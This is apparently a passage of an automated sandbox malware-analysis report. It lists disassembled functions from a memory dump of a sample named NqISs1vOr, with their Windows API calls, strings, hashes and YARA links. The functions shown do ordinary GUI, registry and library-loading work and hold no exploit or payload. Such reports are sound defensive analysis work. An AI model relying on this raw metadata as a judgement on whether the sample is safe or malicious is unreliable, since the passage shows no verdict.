                                                                  • Instruction ID: d8c93b49542c4992b593f331124e59532eba8c65ca5fe63237d6ba0ca55a8ecc
                                                                  • Opcode Fuzzy Hash: e0c9a44165d56187b0795cac699610ea385af12d5fd7003569757b390febdefd
                                                                  • Instruction Fuzzy Hash: 9E510370A00245ABDB10EF6ADD816EA7BF9AF09304B15857BF904E73A2D738DD41CB58
                                                                  Function 0041BE5B Relevance: 10.7, APIs: 7, Instructions: 153windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF20
                                                                  • GetObjectA.GDI32(?,00000018,?), ref: 0041BF2F
                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF80
                                                                  • GetBitmapBits.GDI32(?,?,?), ref: 0041BF8E
                                                                  • DeleteObject.GDI32(?), ref: 0041BF97
                                                                  • DeleteObject.GDI32(?), ref: 0041BFA0
                                                                  • CreateIcon.USER32(00400000,?,?,?,?,?,?), ref: 0041BFBD
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Object$BitmapBitsDelete$CreateIcon
                                                                  • String ID:
                                                                  • API String ID: 1030595962-0
                                                                  • Opcode ID: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                  • Instruction ID: 4619fcafd17693633a8c31a92518bd0abdf88944d34ea3f3446ff31194e2e661
                                                                  • Opcode Fuzzy Hash: a6b868a807f1f599719e52264ea8325182c659afeabb6b194134e5b91d426331
                                                                  • Instruction Fuzzy Hash: 48510375A00219AFCF10DFA9C8819EEB7F9EF48314B11856AF914E7391D738AD81CB64
                                                                  Function 0041CED0 Relevance: 10.7, APIs: 7, Instructions: 152windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SetStretchBltMode.GDI32(00000000,00000003), ref: 0041CEF6
                                                                  • 73A24620.GDI32(00000000,00000026), ref: 0041CF15
                                                                  • 73A18830.GDI32(?,?,00000001,00000000,00000026), ref: 0041CF7B
                                                                  • 73A122A0.GDI32(?,?,?,00000001,00000000,00000026), ref: 0041CF8A
                                                                  • StretchBlt.GDI32(00000000,?,?,?,?,?,00000000,00000000,00000000,?,?), ref: 0041CFF4
                                                                  • StretchDIBits.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,?,00000000,?), ref: 0041D032
                                                                  • 73A18830.GDI32(?,?,00000001,0041D064,00000000,00000026), ref: 0041D057
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Stretch$A18830$A122A24620BitsMode
                                                                  • String ID:
                                                                  • API String ID: 430401518-0
                                                                  • Opcode ID: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                  • Instruction ID: 9b717f45caa71cbdb3d7743a5068819f31981c945c02765ea0762fde20f1409d
                                                                  • Opcode Fuzzy Hash: c81279b313576d135e7f058ec71da99c22708ae42f226878f0d4e896de0476ba
                                                                  • Instruction Fuzzy Hash: 17513F70604204AFDB14DFA8C985F9BBBF9EF08304F14459AB545E7692C778ED81CB58
                                                                  Function 004570FC Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SendMessageA.USER32(00000000,?,?), ref: 0045714E
                                                                    • Part of subcall function 00424274: GetWindowTextA.USER32(?,?,00000100), ref: 00424294
                                                                    • Part of subcall function 0041EE9C: GetCurrentThreadId.KERNEL32 ref: 0041EEEB
                                                                    • Part of subcall function 0041EE9C: 73A25940.USER32(00000000,0041EE4C,00000000,00000000,0041EF08,?,00000000,0041EF3F,?,0042EEA8,?,00000001), ref: 0041EEF1
                                                                    • Part of subcall function 004242BC: SetWindowTextA.USER32(?,00000000), ref: 004242D4
                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 004571B5
                                                                  • TranslateMessage.USER32(?), ref: 004571D3
                                                                  • DispatchMessageA.USER32(?), ref: 004571DC
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Message$TextWindow$A25940CurrentDispatchSendThreadTranslate
                                                                  • String ID: [Paused]
                                                                  • API String ID: 3047529653-4230553315
                                                                  • Opcode ID: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                                  • Instruction ID: 4dd0f6a69861fba71970a0c95394483262e0630457e8f7cd4854214566cc162d
                                                                  • Opcode Fuzzy Hash: 80c4c27c4b754fe1519de729eb729efa4ffa2fc2b03d19605f480c373ee661fa
                                                                  • Instruction Fuzzy Hash: EC3196319082449EDB11DFB5EC81B9E7FB8EB49314F5544BBF800E7292D63C9909CB69
                                                                  Function 0046B240 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 99sleepCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursor.USER32(00000000,0046B37F), ref: 0046B2FC
                                                                  • LoadCursorA.USER32(00000000,00007F02), ref: 0046B30A
                                                                  • SetCursor.USER32(00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B310
                                                                  • Sleep.KERNEL32(000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B31A
                                                                  • SetCursor.USER32(00000000,000002EE,00000000,00000000,00007F02,00000000,0046B37F), ref: 0046B320
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Cursor$LoadSleep
                                                                  • String ID: CheckPassword
                                                                  • API String ID: 4023313301-1302249611
                                                                  • Opcode ID: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                                  • Instruction ID: dcef8ef75e700f151948083f515970cfb06be99f29bdf3d7051495a11b4a934f
                                                                  • Opcode Fuzzy Hash: c5bdf5f640806f8796bfbc41b1a4ab00d3ded5bef946e97f85f4201d994c149c
                                                                  • Instruction Fuzzy Hash: 9D3190347402049FD701EF69C899B9E7BE4EB49304F5580B6B904DB3A2E7789E80CB89
                                                                  Function 00477700 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 92windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 00477628: GetWindowThreadProcessId.USER32(00000000), ref: 00477630
                                                                    • Part of subcall function 00477628: GetModuleHandleA.KERNEL32(user32.dll,AllowSetForegroundWindow,00000000,?,?,00477727,0049C0A4,00000000), ref: 00477643
                                                                    • Part of subcall function 00477628: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00477649
                                                                  • SendMessageA.USER32(00000000,0000004A,00000000,00477ABA), ref: 00477735
                                                                  • GetTickCount.KERNEL32 ref: 0047777A
                                                                  • GetTickCount.KERNEL32 ref: 00477784
                                                                  • MsgWaitForMultipleObjects.USER32(00000000,00000000,00000000,0000000A,000000FF), ref: 004777D9
                                                                  Strings
                                                                  • CallSpawnServer: Unexpected response: $%x, xrefs: 0047776A
                                                                  • CallSpawnServer: Unexpected status: %d, xrefs: 004777C2
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CountTick$AddressHandleMessageModuleMultipleObjectsProcProcessSendThreadWaitWindow
                                                                  • String ID: CallSpawnServer: Unexpected response: $%x$CallSpawnServer: Unexpected status: %d
                                                                  • API String ID: 613034392-3771334282
                                                                  • Opcode ID: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                  • Instruction ID: 5facb6da61392f64ef9a6a7cc904dffa3fea64199446eda4e4b81d1598b422a3
                                                                  • Opcode Fuzzy Hash: e1b07b7da0dc81f79c626057223c48b53da9c8a9430d466ab72b2e6b955821c4
                                                                  • Instruction Fuzzy Hash: 0131E474F042158ADF10EBB9C8467EEB6A09B08304F90807AB508EB382D67C5E01C79D
                                                                  Function 004595A4 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 86libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetProcAddress.KERNEL32(626D6573,CreateAssemblyCache), ref: 0045965F
                                                                  Strings
                                                                  • Failed to get address of .NET Framework CreateAssemblyCache function, xrefs: 0045966A
                                                                  • CreateAssemblyCache, xrefs: 00459656
                                                                  • Fusion.dll, xrefs: 004595FF
                                                                  • Failed to load .NET Framework DLL "%s", xrefs: 00459644
                                                                  • .NET Framework CreateAssemblyCache function failed, xrefs: 00459682
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc
                                                                  • String ID: .NET Framework CreateAssemblyCache function failed$CreateAssemblyCache$Failed to get address of .NET Framework CreateAssemblyCache function$Failed to load .NET Framework DLL "%s"$Fusion.dll
                                                                  • API String ID: 190572456-3990135632
                                                                  • Opcode ID: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                                  • Instruction ID: ee3dd963a50cff277cc460556b086b348bcce4d3c12070cda944c03b6b96f9ce
                                                                  • Opcode Fuzzy Hash: 6db9dd5a59cee9e125ea37fcdd1d071909f295375ba02b74572753309365d729
                                                                  • Instruction Fuzzy Hash: 5D315771E00609EBCB01EFA5C88169EB7A5AF44315F50857BE814A7382DB7C9E09CB99
                                                                  Function 0041C140 Relevance: 10.6, APIs: 7, Instructions: 70windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0041C040: GetObjectA.GDI32(?,00000018), ref: 0041C04D
                                                                  • GetFocus.USER32 ref: 0041C160
                                                                  • 73A1A570.USER32(?), ref: 0041C16C
                                                                  • 73A18830.GDI32(?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C18D
                                                                  • 73A122A0.GDI32(?,?,?,00000000,00000000,0041C1EB,?,?), ref: 0041C199
                                                                  • GetDIBits.GDI32(?,?,00000000,?,?,?,00000000), ref: 0041C1B0
                                                                  • 73A18830.GDI32(?,00000000,00000000,0041C1F2,?,?), ref: 0041C1D8
                                                                  • 73A1A480.USER32(?,?,0041C1F2,?,?), ref: 0041C1E5
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: A18830$A122A480A570BitsFocusObject
                                                                  • String ID:
                                                                  • API String ID: 2231653193-0
                                                                  • Opcode ID: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                  • Instruction ID: 42301c90dcb8571f5cbc3500225c3f0eaf81cc24073f805a24a28427ce123417
                                                                  • Opcode Fuzzy Hash: 9c9984a03792254f7cf3ad1787892f213a144d0a64db434cb782e1e94da2dcd6
                                                                  • Instruction Fuzzy Hash: D7116D71A44618BBDF00DBE9CC81FAFB7FCEB48700F14446AB518E7281DA3899008B28
                                                                  Function 00418C4C Relevance: 10.6, APIs: 7, Instructions: 67COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetSystemMetrics.USER32(0000000E), ref: 00418C68
                                                                  • GetSystemMetrics.USER32(0000000D), ref: 00418C70
                                                                  • 6F532980.COMCTL32(00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418C76
                                                                    • Part of subcall function 004099A8: 6F52C400.COMCTL32(0049B628,000000FF,00000000,00418CA4,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 004099AC
                                                                  • 6F59CB00.COMCTL32(0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001,00000000), ref: 00418CC6
                                                                  • 6F59C740.COMCTL32(00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E,00000001,00000001,00000001), ref: 00418CD1
                                                                  • 6F59CB00.COMCTL32(0049B628,00000001,?,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000), ref: 00418CE4
                                                                  • 6F530860.COMCTL32(0049B628,00418D07,?,00000000,?,0049B628,00000000,00000000,00000000,00000000,00418D00,?,00000000,0000000D,00000000,0000000E), ref: 00418CFA
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: MetricsSystem$C400C740F530860F532980
                                                                  • String ID:
                                                                  • API String ID: 209721339-0
                                                                  • Opcode ID: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                  • Instruction ID: c5403bac5749a6cea20ad86aefc03aeb17a2f2ee6000d3a37742d6553dc7a201
                                                                  • Opcode Fuzzy Hash: 3e87c7a23a4a947163f4d2b90e583babc0fab05060521c53009111721e1cf9e6
                                                                  • Instruction Fuzzy Hash: 981124B1B44304BFDB10EBA9EC82F5E73B8DB48714F50406AB504EB2C2DAB99D408659
                                                                  Function 00483228 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 61registryCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                    • Part of subcall function 0042DE14: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,0048319F,?,00000001,?,?,0048319F,?,00000001,00000000), ref: 0042DE30
                                                                  • RegCloseKey.ADVAPI32(?,?,00000001,00000000,00000000,004832E0), ref: 004832C5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CloseOpen
                                                                  • String ID: LanmanNT$ProductType$ServerNT$System\CurrentControlSet\Control\ProductOptions$WinNT
                                                                  • API String ID: 47109696-2530820420
                                                                  • Opcode ID: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                                  • Instruction ID: b53b4caf4df369742718f420b864b5eadf64457ff5313130662490eff196aabe
                                                                  • Opcode Fuzzy Hash: 069f94f9fa12544f7a36e7bd85e6d1afcaa647915ea6f8fcf756052135ad9446
                                                                  • Instruction Fuzzy Hash: 7E115130704244AADB10FFA59852B5F7BA8DB55B05F6188B7A800A7282D7389E02871D
                                                                  Function 00494A14 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 57COMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • 73A1A570.USER32(00000000,?,?,00000000), ref: 00494A25
                                                                    • Part of subcall function 0041A1E0: CreateFontIndirectA.GDI32(?), ref: 0041A29F
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 00494A47
                                                                  • GetTextExtentPointA.GDI32(00000000,ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz,00000034,00494FC5), ref: 00494A5B
                                                                  • GetTextMetricsA.GDI32(00000000,?), ref: 00494A7D
                                                                  • 73A1A480.USER32(00000000,00000000,00494AA7,00494AA0,?,00000000,?,?,00000000), ref: 00494A9A
                                                                  Strings
                                                                  • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz, xrefs: 00494A52
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: Text$A480A570CreateExtentFontIndirectMetricsObjectPointSelect
                                                                  • String ID: ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz
                                                                  • API String ID: 1435929781-222967699
                                                                  • Opcode ID: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                  • Instruction ID: 4a1d9e00790e4e8279befe01d539e981fbc0a950f87c09723c3c89301347e02c
                                                                  • Opcode Fuzzy Hash: 2902dc2c583c5dec24c60d58c3a9fd6cff270746e0fce7babd2e3a3436007c92
                                                                  • Instruction Fuzzy Hash: FA015E76A44604AFDB14DBA9CC41E5EB7ECDB48704F610476B604E7281DA78AE008B6C
                                                                  Function 0041B45A Relevance: 10.6, APIs: 7, Instructions: 57windowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • SelectObject.GDI32(00000000,?), ref: 0041B468
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B477
                                                                  • StretchBlt.GDI32(?,00000000,00000000,0000000B,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0041B4A3
                                                                  • SelectObject.GDI32(00000000,00000000), ref: 0041B4B1
                                                                  • SelectObject.GDI32(?,00000000), ref: 0041B4BF
                                                                  • DeleteDC.GDI32(00000000), ref: 0041B4C8
                                                                  • DeleteDC.GDI32(?), ref: 0041B4D1
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: ObjectSelect$Delete$Stretch
                                                                  • String ID:
                                                                  • API String ID: 1458357782-0
                                                                  • Opcode ID: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                  • Instruction ID: d121cbdfe682723b668f1aba97a5ca8eb2ba63952d9ca8216d3140e682204302
                                                                  • Opcode Fuzzy Hash: 72b6a28bf9d60e237e3396a0a8e2fc7d77968e10b7c0149e345d15a7b5d8e936
                                                                  • Instruction Fuzzy Hash: 46115C72E00619ABDB10DAD9DD85FEFB7BCEF08704F144555B614F7281C678AC418BA8
                                                                  Function 0042338C Relevance: 10.6, APIs: 7, Instructions: 56threadwindowCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetCursorPos.USER32 ref: 004233A7
                                                                  • WindowFromPoint.USER32(?,?), ref: 004233B4
                                                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 004233C2
                                                                  • GetCurrentThreadId.KERNEL32 ref: 004233C9
                                                                  • SendMessageA.USER32(00000000,00000084,?,?), ref: 004233E2
                                                                  • SendMessageA.USER32(00000000,00000020,00000000,00000000), ref: 004233F9
                                                                  • SetCursor.USER32(00000000), ref: 0042340B
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                                                  • String ID:
                                                                  • API String ID: 1770779139-0
                                                                  • Opcode ID: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                  • Instruction ID: 5b5036a29de233914ad27f5bfe0a39b591155b03ca34aa4f0141610fd726b6de
                                                                  • Opcode Fuzzy Hash: c9ba26483528a121f971c2dd70aae3c664ebef1f4767206ef3dc65e1b1b17165
                                                                  • Instruction Fuzzy Hash: 3501D4323046102AD6217B755C82E2F26E8DB85B29F60447FF504BB287DA3DAD11936D
                                                                  Function 00494838 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 47libraryloaderCOMMON
                                                                  Download Yara Rule
                                                                  APIs
                                                                  • GetModuleHandleA.KERNEL32(user32.dll), ref: 00494848
                                                                  • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 00494855
                                                                  • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 00494862
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000003.00000002.3047602013.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                  • Associated: 00000003.00000002.3047575301.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047680147.0000000000499000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047705339.000000000049A000.00000008.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047737646.000000000049B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                  • Associated: 00000003.00000002.3047772691.00000000004AB000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_3_2_400000_NqISs1vOr.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModule
                                                                  • String ID: GetMonitorInfoA$MonitorFromRect$user32.dll
                                                                  • API String ID: 667068680-2254406584
                                                                  • Opcode ID: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                                  • Instruction ID: 57979f0f623c6713f86cfc51a9e85cc39870524a60e3ac3170e58067450f8277
                                                                  • Opcode Fuzzy Hash: 21af07142c53872dca5cd0674b34382539a139ddeec0bf3a3c9dc52e9c6734d9
                                                                  • Instruction Fuzzy Hash: 68F0F69AB01F5526DA20B5A69C42E7B6ACCCBC17A4F150137FD04B73C2E99C8C0242FD
                                                                  Function 0045D4A8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33libraryloaderCOMMON
                                                                  Download Yara Rule
